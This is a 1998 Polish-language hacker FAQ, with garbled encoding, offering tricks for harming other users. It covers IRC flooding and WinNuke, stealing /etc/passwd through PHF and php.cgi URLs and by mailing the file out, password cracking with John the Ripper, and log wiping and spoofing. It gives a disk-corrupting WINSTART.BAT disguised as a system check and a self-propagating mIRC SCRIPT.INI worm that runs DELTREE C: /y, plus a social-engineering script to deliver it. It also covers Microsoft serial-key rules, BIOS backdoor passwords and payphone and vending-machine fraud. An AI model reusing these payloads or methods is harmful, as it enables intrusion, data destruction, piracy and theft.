ÚÄÄżÚÄÄÂÄÄÄÄÄÂÄÄÄÄÄÄż ÚÄÄÂÄÄż ÚÄÄż ÚÄÄÄÄż ÚÄÄÄÄÄÄżÚÄÄżÚÄÄÄÄż ÚŮŰŰŔŮŰŰłŰŰŰŰŰłŰŰŰŰŰŰłÚŮŰŰłŰŰł łŰŰł ÚŮŰŰŰŰŔż łŰŰŰŰŰŰĂŮŰŰĂŮŰŰŰŰŔż ÚŮŰŰŰ ŰŰŰĂÄÄÄÄÂÁÄżŰŰÚÄĹŮŰŰŰłŰŰł łŰŰł łŰŰÚżŰŰł łŰŰ ÄÂÂŮŰŰŰłŰŰÚżŰŰł ÚŮŰŰŰŰŰŰŰŰłŰŰŰŰł łŰŰłÚŮŰŰŰŰłŰŰł łŰŰł łŰŰłłŰŰł łŰŰŰŰĂŮŰŰŰŰłŰŰŔŮŰŰł ÚŮŰŰ ŰŰŰ ŰŰĂÄÄÄÄÁż łŰŰĂŮŰŰ ŰŰłŰŰŔÄÄÄ´ŰŰŔÄÄÄ´ŰŰŔŮŰŰł łŰŰÚÂŮŰŰ ŰŰłŰŰ ŰŰŰŔż łŰŰÚżŰŰÚżŰŰłŰŰŰŰŰł łŰŰłŰŰ ŰŰŰłŰŰŰŰŰŰłŰŰŰŰŰŰĂżŰŰŰŰÚŮ łŰŰłłŰŰ ŰŰŰĂżŰŰŰ ŰŰł ŔÄÄŮŔÄÄŮŔÄÄÁÄÄÄÄÄŮ ŔÄÄÁÄÄÄÄÄÄÁÄÄÄÄÄÄÁÄÄÄÄÄÄŮŔÄÄÄÄŮ ŔÄÄŮŔÄÄÄÄÄÄŮŔÄÄÄÄÄÄŮ ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ ver. 1.5 22 marca 98 polskie znaki: Latin 2 ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ Witajcie bracia! ťaski WszechmogĄcego niechaj spynĄ na was, a tych kt˘rzy Jego imi© kalajĄ niechaj pochonĄ czeluci piekielne. Pan z Wami! Tekst ten nasta wyĄcznie w celach edukacyjnych i nie ponosz© odpowiedzialnoci za utrat© dost©pu do Internetu lub czegokolwiek innego w wyniku stosowania metod tu opisanych, czyli jak ci© kto namierzy i udupi to miej pretensje do samego siebie a nie do mnie. Jest on o wszystkim po trochu, tzn. o IRC-u, phreakingu, hackerstwie, Unixie i podobnych sprawach. B©dzie on stale uaktualniany jak tylko dowiem si© czego ciekawego, co godne zamieszczenia b©dzie. Cz©† tego FAQ jest mojego autorstwa, a cz©† to texty z FAQ innych hacker˘w lub zasyszane w r˘ľnych okolicznociach ;) ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ Spis treci 1. IRC 1.1. Jak komu dokopa† 1.2. Boty 2. Unix 2.1. Jak si© wama† 3. Windoza - zady i walety 3.1. Winword 3.2. Plik win.ini 3.3. Plik winstart.bat 3.4. Logo windozy 3.6. Cudowne komendy 3.7. mIRC i jego skrypty 4. BIOS-y 5. Phreaking 5.1. Budki telefoniczne 5.1.1. Automaty na ľetony 5.1.2. Automaty na karty 5.2. Automaty sprzedajĄce Col© 5.3. Wodomierze 1. IRC 1.1. Jak komu dokopa† Istnieje wiele sposob˘w aľeby komu dokopa† na IRC-u. JednĄ z metod stosowanych na r˘ľnorakich lamerk˘w jest np. wejscie na query i zaproszenie na kana #5,0. Kto wejdzie na ten kana zostanie wyrzucony z serwera :). Moľna teľ wpisa†: /me has invited you to join #5,0 - jak kto jest lamer to nie odr˘ľni tego od prawdziwego invite ale prawdziwi hackerzy stosujĄ zwykle bardziej wyrafinowane metody. Moľna teľ kogo sfloodowa† czyli zasypa† go bzdurnymi tekstami typu "zesraj si© dziadu...", funkcjami CTCP (ping, version, time, finger, page, userinfo, clientinfo). Co ambitniejsi stosujĄ floodowanie z kilku sesji - jest bardziej efektywniejsze i zmniejsza zagroľenie wykopania z serwera za flood. Moľna takľe wykorzysta† WinNuke do namierzenia gocia na IRC-u i zawieszenie mu komputera :) ale on musi mie† windoz© 95. Jak kto chce WinNuke to niech mailnie. 1.2. Boty Bot jest to program, kt˘ry siedzi na IRC-u i udaje normalnego usera. Ma on jednak wbudowane r˘ľne funkcje np. autokick za flood lub za wulgaryzmy, autoop, protect i tak dalej. O stawianiu bota na razie nie b©d© si© rozpisywa†, napisz© tylko, ľe aby postawi† takiego bota, trzeba mie† konto unixowe. Niekt˘re boty wymagajĄ takľe zainstalowanego klienta IRC na tym koncie. To by byo na razie o stawianiu bot˘w, wi©cej moľecie si© dowiedzie† z plik˘w readme doĄczonych do konkretnego bota. Teraz moľe co o rozwalaniu wyľej wymienionych. No wi©c jeli bot jest gupi, moľna go spr˘bowa† zfloodowa† z kilku sesji - niekt˘re wyrzucajĄ na kana texty w stylu "Floodujesz mnie synu...", albo wchodzimy z np. trzech sesji, z kaľdej czynimy "/CTCP VERSION bot" po 50 razy (ľeby nas nie wywalio) a p˘«niej "/IGNORE bot". Jeli uda si© go sfloodowa† w ten spos˘b bot b©dzie praktycznie cay czas rzuca tymi textami lub odpowiada na VERSION i w koäcu go wywiozĄ z serwera za flood :) 2. Unix 2.1. Jak si© wama† Aby wama† si© do serwera Unixowego i pozna† czyje haso, lub uzyska† konto niekoniecznie z akceptacjĄ szanownego administratora, naleľy zdoby† plik /etc/passwd na tym serwerze lub dopisa† si© do niego. Dobrze jest mie† zaoľony jaki lewy e-mail do cel˘w hackerskich gdzie na polboksie, hotmailu, geocities, kki lub czym podobnym. Uľyj zmylonych personali˘w (imi©/nazwisko/adres). Moľesz teľ uľy† iname (www.iname.com) jako "redirectora" - jak masz np. maila izydor@polbox.com to moľesz sobie zaoľy† np. izydor@writeme.com, izydor@polandmail.com, izydor@2die4.com, izydor@2sexy4u.com... (jak kto tam napisze, to mail zostanie posany dalej na polbox) lub jaki inny mao znaczĄcy - trzeba si© nie«le nam©czy† ľeby zobaczy† imi©, nazwisko i prawdziwy e-mail, a ten i tak jest anonimowy :). Opr˘cz tego, jeli haczycie z dial-up˘w (dzwonicie przez modem do jakiego providera) to jest to wysoce karalne - administrator zobaczy ľe jaki czowieczek np. izydor@dial-79.supermedia.pl ciĄgnĄ passwd i co dalej? Ot˘ľ ten to admin pisze sobie maila do administratora Supermedii, i namierza, kt˘ľ to jest ten izydor. Moľna za to w najlepszym przypadku straci† konto. Wi©c najlepiej korzysta† z darmowego dial-upu tpsa (suxx, ale do hackerstwa wystarczy). Jak admin zobaczy w logach noname@ppp-86.warszawa.tpnet.pl to ci wiele nie zrobi, ale jak sie uprze, to potrafi ci© namierzy†. Moľna jeszcze robi† tak: zhaczy† zobie np. trzy serwery, na kaľdym po kilka kont. P˘«niej telnetowa† si© na pierwszy, przez pierwszy na drugi, p˘«niej na trzeci, p˘«niej zn˘w na pierwszy, ale pod innym kontem... uczyni† takĄ p©telk©, p˘«niej np. zrzuci† passwd, zrobi† przemeblowanie na serwerze, a p˘«niej wycofywa† si© z p©tli - jak telnetujesz si© np. do Francji, z Francji do Finlandii, p˘«niej jeszcze do USA i przez USA do Polski to zanim dojdĄ kto si© wama minie p˘ roku ;) * Metody zdobycia pliku passwd Gdy masz konto: - Telnetujesz si© na serwer, logujesz si© i piszesz "cat /etc/passwd" i wywietla si© ten plik (jeli akurat masz dost©p do niego, np. jeste rootem, albo jest udost©pniony dla wszystkich). SĄ specjalne programiki do "bycia rootem" wykorzystujĄce r˘ľnorakie dziury w systemie, a zowiĄ si© one exploitami. Wyst©pujĄ one w duľych ilociach na rootshellu (www.rootshell.com). Moľna jeszcze ewentualnie uczyni† to tak: "cat /etc/passwd | mail inydor@writeme.com" (korzystamy z redirectora) P˘«niej odbieramy mejle i dostajemy plik /etc/passwd prosto do skrzynki pocztowej. Gdy nie masz konta: - Uruchamiasz FTP, wpisujesz adres serwera, login ftp (lub anonymous), w password zalecajĄ podanie adresu e-mailowego ale podaj jaki zmylony lub sam znak @ (b©dzie w logach) i piszesz "get /etc/passwd". Uwaga - ta metoda dziala bardzo rzadko (na lamerskich serwerach, z takimiľ adminami), w innych przypadkach passwd jest falszywy, albo zshadowany, albo jedno i drugie ;) - Metoda PHF - wpisz w browserze: http://www.tu.wpisz.serwer.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd - Metoda PHP - wpisz w browserze: http://www.tu.wpisz.serwer.com/cgi-bin/php.cgi?/etc/passwd Te dwie metody nie dziaajĄ na wszystko, ale moľna popr˘bowa†, jak admin jest lamerkiem i nie chce mu si© instalowa† nowszych wersji program˘w, moľna si© spr˘bowa† pobawi†. *** UWAGA! *** W/w metody majĄ jednĄ wad©: wszystko jest logowane, to znaczy ľe jak wykupie sobie np. konto na Polska Online i od razu zrzucasz sobie passwd, lub co kr©cisz, to jest to zapisywane do specjalnych plik˘w (log˘w). Moľna stosowa† czyszczenie log˘w (np. killog), korzysta† z lewego maila (patrz kilka pi©ter wyľej), lub spoofowa† - np. jak jestemy przez tpsa, to uruchamiamy spooferka i udajemy poĄczenie np. z www.zgroza.com.pl. Ma to jednak duľĄ wad© - jest to "blind spoofing" wi©c serwer-ofiara nie wysya informacji na tw˘j ekran, tylko z uporem maniaka wszystko le na www.zgroza.com.pl. Ale wama† si© moľna. Moľna pr˘bowa† takich rzeczy jak "cat /etc/passwd | mail izydor@writeme.com" - admin nie namierzy, bo w logach zobaczy www.zgroza.com.pl, no wi©c le maila na root@zgroza.com.pl i... po max. dziesi©ciu minutach mail przychodzi z powrotem z dopiskiem "adresat nieznany" :). Moľna tak narobi† chay komu, kogo nie lubimy - po prostu zostawiamy go w logach... biedne dziecko. * Co dalej? Linijka z pliku passwd wyglĄda tak: root:z1YAmW5ZwE7qQ:0:0:root:/root:/bin/bash I jest uczyniona wedug tego wzoru: login:zakodowane haso:numer uľytkownika:numer grupy:opis:katalog domowy:shell Jeli zamiast hasa jest x, lub gwiazdka *, spr˘buj wstuka† /etc/shadow zamiast /etc/passwd, ale moľe nie zadziaa†. Ale jeli juľ masz ten plik, odkoduj go. Aby odkodowa† haso naleľy mie† program do tego celu, jak np. John the Ripper pod DOS. Uruchamianie: john -pwfile:[plik z hasami] -single lub druga metoda (wymaga sownika) john -pwfile:[plik z hasami] -wordfile:[sownik] moľna jeszcze tak: john -pwfile:[plik z hasami] -wordfile:[sownik] -rules UWAGA! to dziaa tylko w Johnie 1.4. Jak co znajdzie to wywietli, a potem... telnetujesz si© i logujesz tak, jak ci poda John :) Jak zamae haso roota moľesz sobie poczyta† jego poczt©, poformatowa† dyski - root ma duľe moľliwoci w systemie. Jak kto chce Johna to niech mailnie. 3. Windoza - zady i walety 3.1. Winword Dopisa† komu do skr˘tu zamiast "winword.exe" "winword.exe -mFileExit". Word zacznie prac© od jej skoäczenia :). Dziaa na Worda 6.0 i 7.0, na Word97 nie sprawdzaem bo nie mam :P 3.2. Plik win.ini Zmieni† komu linijk© "shell=progman.exe" (win 3.1x) na "shell=calc.exe" - zamiast Menedľera Program˘w na poczĄtku wĄczy si© kalkulator :) Moľna teľ wstawi† jaki inny programik typu pbrush.exe - jak kto b©dzie chcia zrobi† co innego niľ rysowanie to si© mocno zawiedzie - zamkni©cie shella koäczy windoz© :) W win95 shellem jest explorer.exe, ale nie manipulowaem przy nim jeszcze, bo mnie si© nie chciao. 3.3. Plik winstart.bat Plik ten naleľy umieci† w katalogu Windows. Jest on uruchamiany przy starcie windozy - moľna dopisa† tam jakie bzdury, szlaczki, krzaczki, melodyjki, pi©tnacie Word˘w czy inne wielce przydatne rzeczy. Moľna teľ tam dopisa† program pod tytuem FLEX - zrzucajĄcy naciskane klawisze na dysk - przydaje si© jak kto ma Windows na haso lub si© loguje do jakiego Novella. Jak kto go chce to niech mailnie. Jeli was to nie satysfakcjonuje, w tymľe pliku moľna jeszcze uczyni† co, aby kasowao gociowi np. win.ini, albo win.com, albo co takiego: --- WINSTART.BAT --- @echo off echo Verifying your system, please wait... rem to dla zachowania pozor˘w, ľe windoza sobie co sprawdza... copy c:\config.sys c:\dos copy c:\autoexec.bat c:\dos rem robimy lamuchowi kopi© zapasowĄ, gdyľ mamy lito† nad zwierz©tami echo System verified. echo Synchronizing drive C: echo Do not interrupt this operation! echo DAMAGED BOOT SECTOR, DISK UNUSABLE > config.sys rem teraz wpisujemy gupoty do config.sys echo dir c:\ /s > autoexec.bat rem a teraz do autoexec.bat - to spowoduje ľe przy starcie systemu b©dzie si© rem wywietlaa zawarto† dysku C: (wszystkie pliki w kaľdym katalogu) echo call autoexec.bat >> autoexec.bat rem a teraz wywoujemy jeszcze raz autoexec, ľeby si© za szybko nie skoäczyo rem po tej linijce dir c:\ /s b©dzie wykonywao si© nieskoäczonĄ ilo† razy, rem dop˘ki kto nie przerwie... a jak przerwie to system wykona polecenie rem "call autoexec.bat" i od nowa Polska ludowa... :) echo Drive C: synchronized, loading Windows now... --- WINSTART.BAT --- Wiersze zaczynajĄce si© od "rem" to komentarze, moľesz je spokojnie wywali†. 3.4. Logo windozy *** dla wersji 3.1x *** No wi©c jest plik win.com i on zawiera w sobie logo. A co by byo jakby jakiemu lamuchowi zmieni† to logo na co innego - np. napis "Killer Virus Activated - Destroying in progress..." ? Wi©kszo† takich lamerk˘w panicznie boi si© wirus˘w, wi©c nasz lamuch w panice zacznie resetowa† komputerek, a jak kto resetuje komputer podczas adowania windozy to moľe si© to «le skoäczy† :>. Logo jest w formacie RLE - to taki jaki obskurny format graficzny, obsuguje go na przykad Graphics Workshop. Jeli chcecie zmienia† orginalne logo - jest ono w podkatalogu system, nazywa si© vgalogo.rle. No wi©c wĄczamy jaki program malarski, piszemy np. napisik straszĄcy. I co dalej? W podkatalogu system jest plik win.cnf. Jest to plik, kt˘ry moľe zast©powa† win.com, ale jest od niego nieco mniejszy - brakuje mu logo. PrzyjmujĄc, ľe nowe logo naszego autorstwa nazywa si© lame.rle i jest w katalogu system, piszemy tak: C:\WINDOWS\SYSTEM>copy /b win.cnf +lame.rle ..\win.com Po takim zabiegu uczyni si© nowy win.com, zawierajĄcy nasze logo. Stary moľemy sobie uprzednio zasejwowa† pod innĄ nazwĄ lub przywr˘ci† tak: C:\WINDOWS\SYSTEM>copy /b win.cnf +vgalogo.rle ..\win.com I juľ. Lamerka moľna nie«le nastraszy†. Tylko nie przesad«cie - plik win.com moľe mie† najwyľej 64 KB, p˘«niej mogĄ nastĄpi† problemy... *** dla windozy 95 *** Defaultowe logo tym razem nie wiem gdzie jest, bo nie chciao mi si© sprawdza† :P Ale jeli uczynimy sobie bitmapk© o rozmiarach 320 na 400, w 256 kolorkach, z zawartociĄ podobnĄ jak pi©tro wyľej, i zasejwujemy jĄ jako C:\LOGO.SYS, to wanie ona wywietli si© przy starcie tego jakľe wspaniaego systemu... Huh. Moľna jeszcze zmieni† lamuchowi bitmapy C:\WINDOWS\LOGOW.SYS (poczekaj na zamkni©cie systemu) i C:\WINDOWS\LOGOS.SYS (Moľna teraz bezpiecznie wyĄczy† komputer). Przy zamykaniu systemu, windoza sejwuje r˘ľne swoje pliczki. No wi©c napis o wirusie wstawiamy do LOGOW.SYS i... huh. 3.5. Numery seryjne M$ Kiedy instalujesz kolejny wspaniay wytw˘r znanej na caym wiecie firmy Mikro$oft, przychodzi moment, ľe installer pyta ci© o kod. A co uczyni† jeli, hmm, powiedzmy ľe ten to kod zapomniae spisa† od kumpla, lub nie istnia w pudeku z programem (bo nie mia pudeka), ani w instrukcji (bo ľadnej instrukcji nie byo), a cracka na razie nie ma? No wi©c jeli kod jest w formie XXXX-XXXXXXXX to wpisz 1234-12345467 - powinno zadziaa†. Kody w postaci XXX-XXXXXXX sĄ zbudowane w nast©pyjĄcy spos˘b: trzy pierwsze cyfry sĄ dowolne, a suma nast©pnych musi by† podzielna od 7 i wi©ksza od 7, czyli moľna wpisa† 000-4031337. IstniejĄ jeszcze numerki, kt˘re sĄ uczynione na ten wz˘r: XXXXX-OEM-XXXXXXX-XXXXX. Zasada jest nast©pujĄca: trzy dowolne cyfry, p˘«niej 95, 96 lub 97 (rok produkcji, np. dla win osr2-97, dla osr1-96, dla zwykych-95), suma nast©pnych siedmiu musi by† podzielna przez 7 i wi©ksza od 7 (jw.), a ostatnie pi©† cyfr jest dowolne, no wi©c przykadowy numerek b©dzie wyglĄda tak: 83696-OEM-4031337-89364. Huh, mam nadziej© ľe komu pomogem. 3.6. Cudowne komendy IstniejĄ sobie komendy, kt˘re warto wykona† zdalnie przez windoz© jakiemu lamuchowi. JednĄ z nich jest "DELTREE C: /Y" - kasuje cay dysk. Moľna teľ np. pozby† si© lamucha np. z IRC-a, czyniĄc mu takĄ oto komend© "RUNDLL32 User,ExitWindows" - windoza elegancko si© zamyka. Komendy takie moľna czyni† np. przez strony WWW - o tem potem, w nast©pnej wersji FAQ, bo teraz mi si© nie chce pisa†. :) 3.7. mIRC oraz jego skrypty No wi©c jest sobie taki przeci©tny programik do ircowania. Nazywa si© mIRC. Zajmuj© si© nim dlatego, ľe od pewnego czasu na IRC-u grasuje pewien skrypt. Jest on samo-rozmnaľajĄcy si© (sam si© rozsya jak kto wchodzi/wychodzi na kana na kt˘rym jest zainfekowany). Cay dowcip jest w tym, ľe jako jeden z plik˘w skryptu do mIRC-a jest ustawiony SCRIPT.INI. No wi©c ten to skrypcik wanie tak si© nazywa. Opr˘cz tego jako domylny katalog odbioru dcc jest ustawiony katalog, gdzie jest mIRC (np. C:\MIRC), a tam teľ rezyduje SCRIPT.INI... No wi©c jeli wylemy taki skrypt lamerkowi, kt˘re ma AutoGet, to zarazimy go. Moľemy teľ mu troch© naciemnia†, np. tak: cze! cze chesz moj skrypt pod mIRC-a? a do czego to jest? huh... no dobra jesli ktos cie zabanowal i wykopal, to ty mozesz sam sie odbanowac i wyrzucic go z IRC-a wow super daj! ok :) lap /DCC SEND lamuch SCRIPT.INI mam, co teraz zrobic? teraz przegraj go tam gdzie jest mirc32.exe dzieki! :) Dobra, teraz moľe co o budowie tego skryptu... --- SCRIPT.INI --- [script] n0=;---------------------------------------------------------- n1=; NeoScript ver. 997, (C) 1939 by Adolf H. n2=;---------------------------------------------------------- n3=ON 1:TEXT:!UMRZYJ!:*:/quit jestem lamerem n4=;jezeli ktos napisze !UMRZYJ! - lamera wyrzuca z IRC-a n5=ON 1:TEXT:!KASUJ!:*:/run DELTREE C: /y n6=;reakcja na !KASUJ! - kasacja dysku C: n7=ON 1:TEXT:!EXITWIN!:*:/run RUNDLL32 User,ExitWindows n8=;zamykamy lamerkowi windoze na odleglosc n9=ON 1:JOIN:#:{ n10= if ( $nick != $me ) { /dcc send $nick $mircdirscript.ini n11= } n12=} n13=;rozmnazanie skryptu, jesli ktos wchodzi na kanal dostaje go n14=ON 1:TEXT:!PIERDOLEC!:*:/msg $nick mam pierdolca n15=;info - kto jest zainfekowany ten odpowie n16=ON 1:TEXT:!DAWAJOPA!:?:/mode $chan +o $nick n17=;no comment n18=ON 1:TEXT:!KOP!:?:/ban $me | /kick # $me n19=;lamer sam sie kopie n20=ON 1:TEXT:IDIOTA:*:/amsg jestem idiota i zasranym debilem n21=ON 1:TEXT:LAMER:*:/ame to LAMER! n22=ON 1:TEXT:BLUZGAJ:*:/amsg kurwa cholera huj chuj dupa jebana pizda n23=ON 1:TEXT:MATKA:/amsg moja matka to kurwa n24=;to sluzy do robienia kichy lamerowi --- SCRIPT.INI --- Jak bedziecie to rozpowszechniac to wytnijcie moje komentarze - te zaczynajĄce si© od rednika. Myl© ľe to jest zrozumiae. 4. BIOS-y Jeľeli masz AWARD BIOS-a na haso moľesz wpisa† kilka tzw. unihase (wymyliem nowe sowo) : Zbgn, zbg, AWARD_SW, >AWARD<, condo. Na AMI BIOS-y niekiedy dziaa unihaso ami. Dla Phoenix BIOS unihaso to czasem 1234 lub 1234567. Opr˘cz unihase na AMI BIOS jest jeszcze jedna metoda - AMI Decode. Jest to program wydubujĄcy haso z tego BIOS-u, ale najpierw kto musi ono wpisa†. 5. Phreaking 5.1. Budki telefoniczne Moľna wpiĄ† si© telefonem w kabel przy budce - ale nie r©cz© za skutki - podobno telekomunici to wykrywajĄ i p˘«niej w©drujĄ do budki oraz sprawdzajĄ. Moľna teľ zdoby†/uczyni† telefon taki jak majĄ monterzy - suchawka z tarczĄ (do wybierania) - ľeby by mniejszy. SĄ dwie metody: ciachnĄ† kabelek i podĄczy† sw˘j telefon, albo na koäcu kabla przylutowa† igy i wpina† si© poprzez izolacj©. 5.1.1. Automaty na ľetony - Wrzuci† 5 gr. jako ľeton A - na niekt˘re jeszcze dziaa. - Przywali† nad otw˘r zwrotu ľetonu - zaliczy impuls. - Woľy† yľk© do zwrotu ľeton˘w i pomanipulowa† - zrobi si© zwarcie i zaliczy impuls. - Strzeli† iskrĄ z zapalarki piezoelektrycznej do gazu w tarcz© automatu. 5.1.2. Automaty na karty - Zdobywanie kart: zablokowa† miejsce wypadku kart papierem, foliĄ, zuľytĄ kartĄ, gumĄ do ľucia z zapakami lub checzĄ - karty nie wypadajĄ. Po«niej przyj† wieczorkiem i wyduba† wszystko co tam zostao. Jednakľe osoby proceder ten uprawiajĄcy powinny blokad© przyklei†, albowiem automat wyrzuca karty z pewnĄ siĄ, kt˘ra moľe okaza† si© za duľa i nasz papier moľe wylecie† razem z kartĄ, a chyba nie to byo w planie. :) - Fakeowanie kart: naklei† na nie do koäca zuľytĄ kart© tam© video - rozmagnesuje tam© zamiast karty. P˘«niej odklei† i naklei† nowĄ. Moľna jeszcze kart© usmarowa† lakierem. Praktykowana jest takľe taka metoda: odczyta† sygna z dobrej karty i nagra† go na zuľytĄ, ale do tego trzeba mie† wrodzone zdolnoci ;) - Numer 6230015 - z budki na kart© - pacisz 18gr za 3min i dostajesz sygna czyli moľesz dzwoni† dalej, np. na 0700. 5.2. Automaty sprzedajĄce Col© - Naleľy wrzuci† stare 20 z i kupi† puszk© jakiej cieczy - automat wr©czy ci puszk© oraz wspaniaomylnie wyda reszt© z pi©ciu z. 5.3. Wodomierze - Moľna odkr©ci† np. wod© w wannie tak, aľeby kapaa po kropelce, po czym i† sobie do szkoy, a jak wr˘cimy, to mamy caĄ wann© wody a wodomierz nawet nie drgnie, albo leciutko zmieni si© jego wskazanie, co jest lepsze od burzliwego napeniania wanny H2O ;) ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ * Koniec * Greetingsy dla: przede wszystkim ludzi, z kt˘rych materia˘w korzystaem przy produkcji tekstu powyľszego. Pan z wami! Jeli ten FAQ zawiera jakie niecisoci lub bzdury, lub jeli masz co ciekawego, godnego zamieszczenia, napisz do mnie na metallo@kki.net.pl. ŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰŰ